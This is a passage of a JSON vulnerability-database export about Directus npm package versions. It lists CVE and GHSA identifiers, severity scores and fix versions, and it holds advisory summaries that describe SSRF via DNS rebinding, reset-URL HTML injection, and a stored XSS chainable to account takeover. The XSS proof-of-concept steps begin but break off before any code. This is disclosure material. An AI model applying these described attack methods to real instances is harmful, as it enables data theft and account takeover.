},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-szny-2sbf-v7de"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-v4vz-smcx-gygb"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0"}],"aliases":["CVE-2022-24814","GHSA-xmjj-3c76-5w84"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p7d9-91j7-dbab"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330195?format=json","vulnerability_id":"VCID-prpm-x77m-cuha","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35441","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03141","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35441"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-ph52-6
7fq-75wj","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:47:06Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-ph52-67fq-75wj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35441","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35441"},{"reference_url":"https://github.com/advisories/GHSA-ph52-67fq-75wj","reference_id":"GHSA-ph52-67fq-75wj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ph52-67fq-75wj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188807?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-35441","GHSA-ph52-67fq-75wj"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-prpm-x77m-cuha"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/306032?format=json","vulnerability_id":"VCID-pwt9-krmn-7kdd","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53889","reference_id":"","reference_type":"","scores":[{"value":"0.00244","scoring_system":"epss","scoring_elements":"0.47882","published_at":"2026-05-30T12
:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53889"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:29Z/"}],"url":"https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.9.0","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:29Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.9.0"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-7cvf-pxgp-42fc","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:29Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-7cvf-pxgp
-42fc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53889","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53889"},{"reference_url":"https://github.com/advisories/GHSA-7cvf-pxgp-42fc","reference_id":"GHSA-7cvf-pxgp-42fc","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-7cvf-pxgp-42fc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/195594?format=json","purl":"pkg:npm/directus@11.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0"}],"aliases":["CVE-2025-53889","GHSA-7cvf-pxgp-42fc"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pwt9-krmn-7kdd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/17005?format=json","vulnerability_id":"VCID-szny-2sbf-v7de","summary":"Directus is a real-time API and App dashboard for managing SQL database content. 
Directus is vulnerable to Server-Side Request Forgery (SSRF) when importing a file from a remote web server (POST to `/files/import`). An attacker can bypass the security controls by performing a DNS rebinding attack and view sensitive data from internal servers or perform a local port scan. An attacker can exploit this vulnerability to access highly sensitive internal server(s) and steal sensitive information. This issue was fixed in version 9.23.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-26492","reference_id":"","reference_type":"","scores":[{"value":"0.0023","scoring_system":"epss","scoring_elements":"0.45796","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-26492"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/ff53d3e69a602d05342e15d9bb616884833ddbff","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/"}],"url":"https://github.com/directus/directus/commit/ff53d3e69a602d05342e15d9bb616884833ddbff"},{"reference_url":"https://github.com/directus/directus/releases/tag/v9.23.0","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},
{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/"}],"url":"https://github.com/directus/directus/releases/tag/v9.23.0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-26492","reference_id":"CVE-2023-26492","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-26492"},{"reference_url":"https://github.com/advisories/GHSA-j3rg-3rgm-537h","reference_id":"GHSA-j3rg-3rgm-537h","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j3rg-3rgm-537h"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h","reference_id":"GHSA-j3rg-3rgm-537h","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63067?format=json","purl":"pkg:npm/directus@9.23.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-jmem-8d4q-x7br"}],"resource_url":"http:
//public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.0"},{"url":"http://public2.vulnerablecode.io/api/packages/62977?format=json","purl":"pkg:npm/directus@9.23.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-ejme-tqn4-byhk"},{"vulnerability":"VCID-eygf-cb4y-hqd3"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gjju-tu4e-gqfc"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-hrqc-8err-4fbx"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-jmem-8d4q-x7br"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.1"}],"aliases":["CVE-2023-26492","GHSA-j3rg-3rgm-537h"],"r
isk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-szny-2sbf-v7de"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330171?format=json","vulnerability_id":"VCID-tt5x-yjzf-4yab","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35411","reference_id":"","reference_type":"","scores":[{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.05471","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35411"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-q75c-4gmv-mg9x","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T13:36:55Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-q75c-4gmv-mg9x"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35411","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35411"},{"reference_url":"https://github.com/advisories/GHSA-q75c-4gmv-mg9x","reference_id":"GHSA-q7
5c-4gmv-mg9x","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q75c-4gmv-mg9x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188455?format=json","purl":"pkg:npm/directus@11.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1"}],"aliases":["CVE-2026-35411","GHSA-q75c-4gmv-mg9x"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tt5x-yjzf-4yab"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330981?format=json","vulnerability_id":"VCID-ukzv-q5tj-4faq","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39943","reference_id":"","reference_type":"","scores":[{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09767","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39943"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.17.0","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track
","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T14:06:00Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.17.0"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-mvv8-v4jj-g47j","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T14:06:00Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-mvv8-v4jj-g47j"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39943","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39943"},{"reference_url":"https://github.com/advisories/GHSA-mvv8-v4jj-g47j","reference_id":"GHSA-mvv8-v4jj-g47j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mvv8-v4jj-g47j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188807?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-39943","GHSA-mvv8-v4jj-g47j"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ukzv-q5tj-4faq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/17045?format=json","vulnerability_id":"VCID-v4vz-s
mcx-gygb","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nDirectus is a real-time API and App dashboard for managing SQL database content. Instances relying on an allow-listed reset URL are vulnerable to an HTML injection attack through the use of query parameters in the reset URL. An attacker could exploit this to email users URLs that point to the server's domain but may contain malicious code. The problem has been resolved, and the fix was released in version 9.23.0. People relying on a custom password reset URL should upgrade to 9.23.0 or later, or remove the custom reset URL from the configured allow list. Users are advised to upgrade. Users unable to upgrade may disable the custom reset URL allow list as a workaround.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-27474","reference_id":"","reference_type":"","scores":[{"value":"0.00828","scoring_system":"epss","scoring_elements":"0.74823","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-27474"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/issues/17119","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/"}],"url":"https://github.com/directus/directus/issues/17119"}
,{"reference_url":"https://github.com/directus/directus/pull/17120","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/"}],"url":"https://github.com/directus/directus/pull/17120"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-27474","reference_id":"CVE-2023-27474","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-27474"},{"reference_url":"https://github.com/advisories/GHSA-4hmq-ggrm-qfc6","reference_id":"GHSA-4hmq-ggrm-qfc6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4hmq-ggrm-qfc6"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-4hmq-ggrm-qfc6","reference_id":"GHSA-4hmq-ggrm-qfc6","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-4hmq-ggrm-qfc6"}],"fixed_packages":[{"url":"http://public2.vul
nerablecode.io/api/packages/63067?format=json","purl":"pkg:npm/directus@9.23.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-jmem-8d4q-x7br"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.0"},{"url":"http://public2.vulnerablecode.io/api/packages/62977?format=json","purl":"pkg:npm/directus@9.23.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-ejme-tqn4-byhk"},{"vulnerability":"VCID-eygf-cb4y-hqd3"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gjju-tu4e-gqfc"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-hrqc-8err-4fbx"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-jmem-8d4q-x7br"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yu
tw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.1"}],"aliases":["CVE-2023-27474","GHSA-4hmq-ggrm-qfc6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v4vz-smcx-gygb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/347350?format=json","vulnerability_id":"VCID-wgag-36wa-qyay","summary":"Directus has a DOM-Based cross-site scripting (XSS) via layout_options\n### Impact\nDirectus allows an authenticated attacker to save cross site scripting code to the database. This is possible because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element. When chained with [CVE-2024-6534](https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86), it could result in account takeover.\n\n### PoC\nTo exploit this vulnerability, we need to do the following steps using a non-administrative, default role attacker account.\n\n1. Upload the following JavaScript file.\n\nUsing the upload functionality at `POST /files`. 
